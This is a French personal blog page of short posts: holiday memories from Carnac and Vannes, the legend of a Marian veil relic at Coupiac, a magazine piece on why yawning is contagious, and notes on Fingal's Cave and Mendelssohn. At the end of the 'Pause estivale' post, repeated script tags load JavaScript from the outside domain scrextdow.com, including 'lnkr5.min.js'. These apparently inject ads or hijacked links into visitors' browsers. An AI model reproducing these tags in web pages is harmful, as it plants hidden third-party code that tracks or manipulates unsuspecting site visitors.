•  

     

     

    Souvenirs de vacances...

     

    La plage de Carnac, en fin de soirée samedi dernier...

     

     

     

    Cette année encore ce furent de belles vacances, nous avons bien profité de la plage ( châteaux de sable, pâtés etc... avec les petits) j'ai aussi pâtissé avec l'aînée de mes petites filles, je vous donnerai les recettes ultérieurement, nous avons joué à pleins de jeux de société.

     

     

     

    Souvenirs de vacances...

    Le ciel de mes vacances, quelques petits nuages blancs baguenaudent dans le bleu du ciel

     

     

     

    J'ai beaucoup lu, écouté de la musique et aussi visité la cathédrale de Vannes qui est magnifique.

     

     

     

    Souvenirs de vacances...

    La voilà, son clocher dépasse les maison qui sont lovées contre elle.

     

     

     

    Le jour de la rentrée, les trois enfants ont retrouvé leur école respective ils ont l'air contents, nous le sommes aussi bien entendu.

     

    Septembre a déjà coloré d'or et de roux quelques feuilles du cerisier et des deux noisetiers qui ont parsemés le gazon de noisettes que j'ai ramassé avec mes petits enfants. 

     

     

     

    Souvenirs de vacances...

    L'or de septembre dans le cerisier et les noisetiers du jardin...

     

     

     

    Liviaaugustae

     

     

     

     


    20 commentaires
  •  

     

     

     

    Je veux d'abord vous remercie pour tous vos petits mots sympas et vos vœux de bonnes vacances qui ont été exaucés, me voilà de retour après de belles et agréables vacances, le temps était très beau et le soleil présent, ingrédients indispensable pour les vacances.

     

    Pour commencer la semaine, je vous offre la belle histoire du voile de la Vierge et bien qu'elle n'arrête pas de faire de miracles, malgré toutes les merveilles qu'elle nous a offert, les hommes entêtés ne veulent rien savoir...

     

    Liviaaugustae

     

    Le voile de la Vierge...

     

     

    Coupiac (commune de l’Aveyron, France) possède, depuis un temps qui ne peut être inférieur à cinq siècles au moins, un important fragment d'un voile que la tradition a toujours considéré comme ayant appartenu à la Sainte Vierge. La fête officielle de Notre Dame du Saint Voile a toujours lieu le deuxième dimanche après Pâques.

     

    À 800 mètres au nord de Coupiac se trouve la chapelle Notre-Dame de Massiliergues : c'est là que fut caché, dans la terre, le Saint Voile pendant les guerres de Religion au XVIe siècle. La sainte relique fut ainsi soustraite au ravages des protestants dans la région par des personnes pieuses. Celles-ci la cachèrent dans un terrain attenant au cimetière de la paroisse. Elles comptaient la retirer après la guerre, mais la mort les surprit. Le lieu resta secret et la relique fut oubliée.

     

    La tradition raconte qu'un taureau du hameau voisin grattait continuellement la terre aux environs du cimetière et faisait entendre des gémissements extraordinaires. Ce taureau ne mangeait pas ; il était cependant très gras. Intrigués, les habitants creusèrent. Malgré l'humidité et un séjour très prolongé dans la terre, la relique était en parfait état de conservation.  

     

    En 1968, un oratoire, destiné à recevoir la châsse en cuivre doré contenant le Saint Voile, a été aménagé dans une dépendance du presbytère.

     

    La relique aurait la particularité de soigner les yeux malades.

     

     


    16 commentaires
  •  

     

     

    Pause estivale...

     

    (image internet)

     

     

     

    Blog en Pause

    Primo : pour des raisons techniques, mon ordi fait encore des siennes...

    Deusio : je pars samedi vers la côte, pour les vacances estivales, pour retrouver : « le ciel, le soleil et la mer... » comme le chantait autrefois François Deguelt.

    Je vous souhaite à tous un bel été

    Je vous retrouve à la rentrée de septembre, avec un ordi remis en forme...

    Liviaaugustae

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>


    17 commentaires
  •  

     

     

    Je bâille, tu bâilles, il bâille !

     

    Lue dans une revue, le pourquoi et le comment des bâillements, c'est très intéressant.

     

    Liviaaugustae

     

     

     

    Pourquoi baîllons-nous ?

    Prêt à faire dodo avec maman...

     

    (image internet)

     

     

     

     

     

    « Un bon bâilleur en fait bâiller sept » dit le dicton. Mais pourquoi le bâillement est-il communicatif ?

     



     

    Les causes du bâillement

     

    Le bâillement est un phénomène naturel qui survient 5 à 10 fois par jour. Il régule la faim, le sommeil, la veille. Sa fonction est de stimuler votre vigilance quand elle est en baisse, de vous reconnecter à votre environnement. C'est pourquoi vous bâillez au réveil, quand vous êtes fatiguée, quand vous vous ennuyez ou pendant la phase de digestion et... quand vous voyez quelqu'un bâiller.

     

    Humains, poissons, reptiles, mammifères... tous les vertébrés bâillent. Toutefois, l'effet communicatif ne concerne pas toutes les espèces. Seuls l'Homme et les grands primates auraient la capacité à faire bâiller leurs congénères.

     

    Pourquoi bâiller est si communicatif ?

     

    Vous l'aurez remarqué, votre voisine de bureau bâille et il vous prend l'envie irrépressible de vous mettre vous aussi à bâiller. Difficile de résister, c'est comme un réflexe, quelque chose d'instinctif et d'inconscient que vous ne contrôlez pas. Les scientifiques parlent d'échokinésie du bâillement. Votre amie vous parle en se touchant le lobe de l'oreille ? Il y a de fortes chances que vous fassiez la même chose sans vous en rendre compte. En cause, les neurones miroirs, des cellules nerveuses qui vous permettent de vous voir agir à la place de l'autre. Ils interviennent dans le phénomène neurologique à l'origine d'un apprentissage par imitation. C'est grâce aux neurones miroirs que vous êtes notamment douée d'empathie : "Seule la capacité de se mettre à la place de l'autre peut provoquer l'envie de bâiller" expliquait le Dr Oliver Walusinski, spécialiste du bâillement, dans une interview à France Info. Des études par IRM ont confirmé le rôle majeur des neurones miroirs dans l'effet communicatif du bâillement. Toutefois, tout le monde n'a pas la même capacité d'empathie et une personne sur 4 resterait insensible à un bâilleur. Une étude américaine réalisée sur 135 étudiants affirmait que les personnes les plus égoïstes et les moins sociables réagissaient très peu aux bâillements d'autrui tout comme les bébés pas encore doués d'empathie dans les premiers mois de leur vie.

     

    Selon les hypothèses, cet effet communicatif aurait pour but de maintenir la vigilance de tout un groupe et plus la proximité avec le bâilleur est proche plus les probabilités d'imitation sont fortes. Toutefois, l'oisiveté et le niveau de vigilance influenceraient cette capacité de mimétisme. En effet, plus vous êtes concentrée sur une tâche et moins vous êtes sensible aux bâillements de vos pairs.

     

     

     

    Communicatif oui, contagieux non

     

    Attention à la confusion. Alors que le caractère communicatif du bâillement a bien été identifié chez les primates il n'est pas approprié de parler de contagieux, le terme étant associé aux maladies infectieuses qui se transmettent par contact.

     

    Enfin, en plus de stimuler votre vigilance, bâiller vous aidera à recouvrer l'audition pendant un vol en avion, après de la plongée sous-marine et aide à se relaxer. Veillez toutefois à ne pas bâiller la bouche trop grande ouverte, le bâillement est la cause le plus fréquente de luxation de la mâchoire !

     

     


    19 commentaires
  •  

     

     

     

    Hier le poème de Guérin nous parlait de la grotte de Fingal, cette grotte a inspirée beaucoup d'artistes : écrivains, poètes et musiciens.

     

    Je vous offre aujourd'hui ce que wikipédia nous en dit.

     

    Je la trouve très belle et puisque Mendelssohn a vu l'intérieur, on doit pouvoir la visiter à marée basse.

     

    Pour écouter l'ouverture de la symphonie « Les Hébrides » de Mendelssohn, clic sur le lien ci-dessous, c'est tout simplement splendide :

     

    https://www.youtube.com/watch?v=zcogD-hHEYs

     

    Liviaaugustae

     

     

     

    Les grottes de Fingal...

    La grotte de Fingal dans l'île de Staffa

     



     

    Elle forme une nef soutenue par des parois de basalte colonnaire dans laquelle la mer s'engouffre jusqu'à 69m en clapotant, elle est appelée aussi « la caverne musicale ».

     

    Jules Verne s'en inspira en la décrivant dans la scène final de son roman « le rayon vert ».

     

    Lorsque Félix Mendelssohn découvrit à marée basse les coulées de lave figées en formes géométriques parfaites, il exprima son enthousiasme par la composition d'une pièce symphonique intitulée « Les Hébrides »

     

     

     

    Les grottes de Fingal...

    Intérieure de la grotte

     

    (texte et images wikipédia)

     

     

     


    20 commentaires


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique